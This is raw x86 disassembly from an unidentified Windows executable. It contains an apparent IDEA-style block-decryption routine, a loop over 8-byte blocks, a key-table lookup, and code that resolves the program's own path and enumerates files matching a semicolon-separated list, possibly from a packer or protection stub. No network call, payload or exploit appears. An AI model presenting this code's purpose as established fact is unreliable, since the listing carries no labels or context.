var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_28 = word ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = word ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 48h
push ebx
mov [ebp+var_30], ecx
mov [ebp+var_4], 8
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_1C], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_20], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_28], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_2C], ax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov [ebp+var_1C], ax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov [ebp+var_20], ax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov [ebp+var_28], ax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov [ebp+var_2C], ax
loc_4D777E: ; CODE XREF: sub_4D76D7+41E�j
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D781D
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_4D77FE
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
jmp short loc_4D7813
; ---------------------------------------------------------------------------
loc_4D77FE: ; CODE XREF: sub_4D76D7+D8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
loc_4D7813: ; CODE XREF: sub_4D76D7+125�j
mov ax, [ebp+var_32]
mov [ebp+var_34], ax
jmp short loc_4D7832
; ---------------------------------------------------------------------------
loc_4D781D: ; CODE XREF: sub_4D76D7+BF�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_34], ax
loc_4D7832: ; CODE XREF: sub_4D76D7+144�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D78FD
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_4D78DE
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
jmp short loc_4D78F3
; ---------------------------------------------------------------------------
loc_4D78DE: ; CODE XREF: sub_4D76D7+1B8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
loc_4D78F3: ; CODE XREF: sub_4D76D7+205�j
mov ax, [ebp+var_36]
mov [ebp+var_38], ax
jmp short loc_4D7912
; ---------------------------------------------------------------------------
loc_4D78FD: ; CODE XREF: sub_4D76D7+19F�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_38], ax
loc_4D7912: ; CODE XREF: sub_4D76D7+224�j
mov ax, [ebp+var_28]
mov [ebp+var_14], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_1C]
mov [ebp+var_28], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D79C5
movzx eax, [ebp+var_28]
and eax, 0FFFFh
mov [ebp+var_28], ax
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_4D79A6
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_28], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_28]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_28], ax
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
jmp short loc_4D79BB
; ---------------------------------------------------------------------------
loc_4D79A6: ; CODE XREF: sub_4D76D7+280�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
loc_4D79BB: ; CODE XREF: sub_4D76D7+2CD�j
mov ax, [ebp+var_3A]
mov [ebp+var_3C], ax
jmp short loc_4D79DA
; ---------------------------------------------------------------------------
loc_4D79C5: ; CODE XREF: sub_4D76D7+267�j
movzx eax, [ebp+var_28]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3C], ax
loc_4D79DA: ; CODE XREF: sub_4D76D7+2EC�j
mov ax, [ebp+var_20]
mov [ebp+var_C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_2C]
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
add ax, [ebp+var_28]
mov [ebp+var_20], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D7A99
movzx eax, [ebp+var_20]
and eax, 0FFFFh
mov [ebp+var_20], ax
movzx eax, [ebp+var_20]
test eax, eax
jz short loc_4D7A7A
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_20], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_20]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
jmp short loc_4D7A8F
; ---------------------------------------------------------------------------
loc_4D7A7A: ; CODE XREF: sub_4D76D7+354�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
loc_4D7A8F: ; CODE XREF: sub_4D76D7+3A1�j
mov ax, [ebp+var_3E]
mov [ebp+var_40], ax
jmp short loc_4D7AAE
; ---------------------------------------------------------------------------
loc_4D7A99: ; CODE XREF: sub_4D76D7+33B�j
movzx eax, [ebp+var_20]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_40], ax
loc_4D7AAE: ; CODE XREF: sub_4D76D7+3C0�j
mov ax, [ebp+var_28]
add ax, [ebp+var_20]
mov [ebp+var_28], ax
mov ax, [ebp+var_1C]
xor ax, [ebp+var_20]
mov [ebp+var_1C], ax
mov ax, [ebp+var_2C]
xor ax, [ebp+var_28]
mov [ebp+var_2C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_14]
mov [ebp+var_20], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_C]
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz loc_4D777E
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D7B9A
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_4D7B7B
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
jmp short loc_4D7B90
; ---------------------------------------------------------------------------
loc_4D7B7B: ; CODE XREF: sub_4D76D7+455�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
loc_4D7B90: ; CODE XREF: sub_4D76D7+4A2�j
mov ax, [ebp+var_42]
mov [ebp+var_44], ax
jmp short loc_4D7BAF
; ---------------------------------------------------------------------------
loc_4D7B9A: ; CODE XREF: sub_4D76D7+43C�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_44], ax
loc_4D7BAF: ; CODE XREF: sub_4D76D7+4C1�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
test eax, eax
jz loc_4D7C72
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_4D7C53
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
jmp short loc_4D7C68
; ---------------------------------------------------------------------------
loc_4D7C53: ; CODE XREF: sub_4D76D7+52D�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
loc_4D7C68: ; CODE XREF: sub_4D76D7+57A�j
mov ax, [ebp+var_46]
mov [ebp+var_48], ax
jmp short loc_4D7C87
; ---------------------------------------------------------------------------
loc_4D7C72: ; CODE XREF: sub_4D76D7+514�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_48], ax
loc_4D7C87: ; CODE XREF: sub_4D76D7+599�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
pop ebx
leave
retn 0Ch
sub_4D76D7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_4D7D1E
; ---------------------------------------------------------------------------
loc_4D7D17: ; CODE XREF: _4:004D7D44�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_4D7D1E: ; CODE XREF: _4:004D7D15�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_4D7D46
mov eax, [ebp-0Ch]
add eax, 68h
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4D76D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_4D7D17
; ---------------------------------------------------------------------------
locret_4D7D46: ; CODE XREF: _4:004D7D24�j
leave
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7D50 proc near ; CODE XREF: sub_4DE31F+1A�p
; sub_4DEA34+11�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov eax, ds:dword_4E68F0
mov [ebp+var_4], eax
mov ecx, ds:dword_4E68F4
imul ecx, 18h
mov edx, ds:dword_4E68F0
add edx, ecx
mov [ebp+var_8], edx
jmp short loc_4D7D7F
; ---------------------------------------------------------------------------
loc_4D7D76: ; CODE XREF: sub_4D7D50:loc_4D7DB7�j
mov eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_4], eax
loc_4D7D7F: ; CODE XREF: sub_4D7D50+24�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_8]
jz short loc_4D7DB9
mov ecx, 10h
mov edi, [ebp+arg_0]
mov esi, [ebp+var_4]
xor edx, edx
mov [ebp+var_C], edx
repe cmpsb
jz short loc_4D7DA3
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_C], eax
loc_4D7DA3: ; CODE XREF: sub_4D7D50+49�j
mov ecx, [ebp+var_C]
mov [ebp+var_10], ecx
cmp [ebp+var_10], 0
jnz short loc_4D7DB7
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_4D7DBB
; ---------------------------------------------------------------------------
loc_4D7DB7: ; CODE XREF: sub_4D7D50+5D�j
jmp short loc_4D7D76
; ---------------------------------------------------------------------------
loc_4D7DB9: ; CODE XREF: sub_4D7D50+35�j
xor eax, eax
loc_4D7DBB: ; CODE XREF: sub_4D7D50+65�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_4D7D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D7DD0 proc near ; CODE XREF: sub_4D9DC0+D�p
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_170 = byte ptr -170h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D85F3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3408
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_4E68C8
call ds:dword_4E674C ;; InitializeCriticalSection
mov [ebp+var_1C], 0
mov [ebp+var_20], 0
mov [ebp+var_24], 0FFFFFFFFh
mov [ebp+var_4], 0
call sub_4D2E50
and eax, 0FFh
mov ds:dword_4E5B68, eax
push 400h
call sub_4DD35A
add esp, 4
mov [ebp+var_1AC], eax
mov eax, [ebp+var_1AC]
mov [ebp+var_1C], eax
push 0C1Ch
call sub_4DD35A
add esp, 4
mov [ebp+var_1B0], eax
mov ecx, [ebp+var_1B0]
mov [ebp+var_20], ecx
mov ecx, 307h
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
push eax
call ds:dword_4E6714 ;; GetModuleFileNameA
mov eax, [ebp+var_20]
add eax, 0C10h
push eax
mov ecx, [ebp+var_1C]
push ecx
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
call ds:dword_4E6708 ;; GetFullPathNameA
push offset aGetlongpathnam ; "GetLongPathNameA"
push offset aKernel32_0 ; "kernel32"
call ds:dword_4E6718 ;; GetModuleHandleA
push eax
call ds:dword_4E6728 ;; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D7EE2
push 400h
mov eax, [ebp+var_20]
add eax, 10h
push eax
mov ecx, [ebp+var_1C]
push ecx
call [ebp+var_2C]
jmp short loc_4D7F08
; ---------------------------------------------------------------------------
loc_4D7EE2: ; CODE XREF: sub_4D7DD0+FB�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_20]
add edx, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4D7F08: ; CODE XREF: sub_4D7DD0+110�j
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4E67C8 ;; CharUpperBuffA
push 5Ch
mov edx, [ebp+var_20]
add edx, 10h
push edx
call sub_4D1700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
mov [ecx+0C10h], eax
mov edx, [ebp+var_20]
add edx, 10h
mov eax, [ebp+var_20]
mov ecx, [eax+0C10h]
sub ecx, edx
mov edx, [ebp+var_20]
mov [edx+0C14h], ecx
push 400h
mov eax, [ebp+var_20]
add eax, 410h
push eax
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_4E3020 ;; GetShortPathNameA
mov edi, [ebp+var_20]
add edi, 410h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov edx, [ebp+var_20]
add edx, 410h
push edx
call ds:dword_4E67C8 ;; CharUpperBuffA
push 5Ch
mov eax, [ebp+var_20]
add eax, 410h
push eax
call sub_4D1700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
add ecx, 410h
sub eax, ecx
mov edx, [ebp+var_20]
mov [edx+0C18h], eax
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_30], ecx
mov eax, [ebp+var_30]
add eax, 1
push eax
call sub_4DD35A
add esp, 4
mov [ebp+var_1B4], eax
mov ecx, [ebp+var_1B4]
mov ds:dword_4E690C, ecx
mov edx, [ebp+var_20]
add edx, 10h
mov edi, edx
mov edx, ds:dword_4E690C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ds:dword_4E6684
mov edx, [ecx+24h]
and edx, 2
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_28], dl
mov eax, [ebp+var_28]
and eax, 0FFh
test eax, eax
jz loc_4D8101
mov ecx, ds:dword_4E6684
mov edx, [ecx+2Ch]
add edx, 30h
mov [ebp+var_3C], edx
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_38], ecx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4D1700
add esp, 8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_4D80A4
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov edx, [ebp+var_20]
lea eax, [edx+ecx+10h]
mov [ebp+var_34], eax
loc_4D80A4: ; CODE XREF: sub_4D7DD0+2B6�j
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_34]
sub edx, ecx
add edx, [ebp+var_38]
cmp edx, 104h
jb short loc_4D80C4
mov ecx, 0EF000004h
call sub_4DD342
loc_4D80C4: ; CODE XREF: sub_4D7DD0+2E8�j
mov ecx, [ebp+var_38]
add ecx, 1
mov esi, [ebp+var_3C]
mov edi, [ebp+var_34]
add edi, 1
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4E67C8 ;; CharUpperBuffA
loc_4D8101: ; CODE XREF: sub_4D7DD0+277�j
mov edx, [ebp+var_20]
mov dword ptr [edx], 0
mov eax, [ebp+var_20]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_20]
mov ds:dword_4E6908, ecx
mov edx, ds:dword_4E6684
mov eax, [edx+24h]
and eax, 1
test eax, eax
jz short loc_4D8140
push 1
push 1
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call sub_4D8610
add esp, 0Ch
loc_4D8140: ; CODE XREF: sub_4D7DD0+35B�j
push 105h
call sub_4DD35A
add esp, 4
mov [ebp+var_1B8], eax
mov edx, [ebp+var_1B8]
mov [ebp+var_44], edx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4D1700
add esp, 8
add eax, 1
mov [ebp+var_50], eax
mov [ebp+var_48], 0
mov ecx, ds:dword_4E6684
mov edx, [ecx+2Ch]
add edx, 71h
mov [ebp+var_4C], edx
mov edi, [ebp+var_4C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_4C]
add eax, ecx
mov [ebp+var_40], eax
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_40]
jz loc_4D83DB
mov [ebp+var_48], 1
mov edx, [ebp+var_4C]
mov [ebp+var_1A0], edx
jmp short loc_4D81CD
; ---------------------------------------------------------------------------
loc_4D81BE: ; CODE XREF: sub_4D7DD0:loc_4D81F8�j
mov eax, [ebp+var_1A0]
add eax, 1
mov [ebp+var_1A0], eax
loc_4D81CD: ; CODE XREF: sub_4D7DD0+3EC�j
mov ecx, [ebp+var_1A0]
cmp ecx, [ebp+var_40]
jz short loc_4D81FA
mov edx, [ebp+var_1A0]
movsx eax, byte ptr [edx]
cmp eax, 3Bh
jnz short loc_4D81F8
mov ecx, [ebp+var_1A0]
mov byte ptr [ecx], 0
mov edx, [ebp+var_48]
add edx, 1
mov [ebp+var_48], edx
loc_4D81F8: ; CODE XREF: sub_4D7DD0+414�j
jmp short loc_4D81BE
; ---------------------------------------------------------------------------
loc_4D81FA: ; CODE XREF: sub_4D7DD0+406�j
mov eax, [ebp+var_20]
add eax, 810h
mov edi, eax
mov edx, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_54]
push ecx
mov edx, [ebp+var_44]
push edx
push 104h
mov eax, [ebp+var_1C]
push eax
call ds:dword_4E6708 ;; GetFullPathNameA
mov edi, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_44]
push ecx
call ds:dword_4E67C8 ;; CharUpperBuffA
mov edx, [ebp+var_4C]
mov [ebp+var_58], edx
mov [ebp+var_5C], 0
jmp short loc_4D826D
; ---------------------------------------------------------------------------
loc_4D8264: ; CODE XREF: sub_4D7DD0+606�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_4D826D: ; CODE XREF: sub_4D7DD0+492�j
mov ecx, [ebp+var_5C]
cmp ecx, [ebp+var_48]
jnb loc_4D83DB
mov edi, [ebp+var_58]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_19C]
push ecx
mov edx, [ebp+var_44]
push edx
call ds:dword_4E66D0 ;; FindFirstFileA
mov [ebp+var_1A4], eax
cmp [ebp+var_1A4], 0FFFFFFFFh
jz loc_4D83B8
loc_4D82C0: ; CODE XREF: sub_4D7DD0+5D5�j
mov eax, [ebp+var_19C]
and eax, 10h
test eax, eax
jnz loc_4D838F
mov ecx, [ebp+var_50]
push ecx
lea edx, [ebp+var_170]
push edx
call ds:dword_4E67C0 ;; lstrcmpi
test eax, eax
jz loc_4D838F
lea edi, [ebp+var_170]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
